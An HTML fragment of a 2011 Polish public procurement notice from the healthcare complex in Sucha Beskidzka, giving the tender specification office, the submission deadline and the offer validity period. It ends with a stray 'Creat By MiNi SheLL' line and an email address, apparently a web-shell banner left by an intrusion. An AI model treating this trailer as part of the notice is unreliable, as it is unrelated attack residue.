<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Blok B, IV piętro, Zespół Opieki Zdrowotnej ul. Szpitalna 22, 34-200 Sucha Beskidzka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2011 godzina 10:00, miejsce: Sekretariat Zespołu Opieki Zdrowotnej , Blok C, I piętro, ul. Szpitalna 22,34-200 Sucha Beskidzka.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com